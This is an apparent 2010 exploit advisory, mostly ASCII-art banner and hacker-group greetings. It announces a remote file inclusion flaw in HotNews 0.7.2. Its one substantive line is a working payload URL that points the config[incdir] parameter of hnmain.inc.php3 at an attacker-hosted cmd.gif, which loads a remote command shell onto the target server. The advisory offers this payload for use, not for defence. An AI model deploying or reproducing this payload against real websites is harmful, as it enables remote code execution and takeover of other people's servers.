================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ == == @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ == == @@ @@@@@@ @@@@@@@ @@ @ @@ @@@@@@ @@ @@ @@ @@@@@@ == == @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ == == @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ == == @@ @@@@@@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@ == == @@ @@@@@@ @@ @@ @@ @@ @@@@@@@@@@ @@@@@@ @@@@@@ @@ @@ @@@@@@ == == == ================================================================================================ ================================================================================================ ||| ||| ||| ||| [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ [[ [[ [[ HotNews 0.7.2 Remote File Inclusion Vulnerability [[ [[ [[ [[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ | [[ [[ [[ [[ [[ [[ ## Exploit: [[ [[ [[ [[- http://[target]/[path]/includes/hnmain.inc.php3?config[incdir]=[attacker.com]/cmd.gif??? [[ [[ [[ [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ ||| ||| ||| ||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~ Greetz and Thanks to: All member gcc, all member manadocoding ~~~~ ~~~~ ~~~~ ~~~~ MC & gcc team : team_elite , devilbat , zreg , doniskynet , 0pa ~~~~ ~~~~ thanks for : cr4wl3r [ http://shell4u.tk/ ] ~~~~ ~~~~ ~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * - , * - @@ * - @@# * - :@@; * - @@@@@ ......` * - @@@@.@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@` * - @@@@@@@@@@@@@@@@@@@@; * - #@@@@@@@@@@@@@@@@@ * - `@@,@@@@@@@@@@@@@@@@@: * - @@@+@@@@@@@ @@@@@@@;@@@` * - :@@@@@@@@@:@,; @@@@@@@ .@@ * - @@@@@@@@@@@ : @@@@@@@@ @@ * - @@@@' ` ` @@@@@@@@@: +. * - .@@ @@@@@@@@@@@ . * - , +@@@@@@@@@@@@@ * - +@@@@@@@@@@@@@@@@@@@@# * - ,@@@@@@@@@@@@@@@@@ +@@@ * - `@@@@@@@@@@@@@@@@@@@ @@@ * - @@@@@@@@@@@@@@@@@@@ @@` * - @@@@@@@@@@@@@@@@@@ @@ * - +@@@@@@@@@@; @@@# @ * - @@@@@@@@@ : * - @@@@@@@@ ,@@ * - @@@@@@@@@ @@@' * - @@@@@@@`@ @@@; * - @@@@@@@ @ @. @@@@@@@@ * - @@@@@@@@@ @@@@@@@@@@@@@# * - @@@@@@@@@@@@ @@@@@@@@@@@@@@@ * - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@ * - @ @@@@@@@@@@@@@@@@@@@ ,@@@@+ * - @@@@@@@@@@@@@@@@@@@ @@@@ * - @@@ @@@@@@@@@ @@@@@@; @@@@ * - @@ @@@@@@@` @@@ . @@. * - @@ ; @@@@# :@@@@@# @@. * - @ @@@: ;@ * - ;` @@ ;@ * - @@ @ * - @ # * - : : * --------------------------------------------->>>> bugs found on 11 April 2010 by team_elite.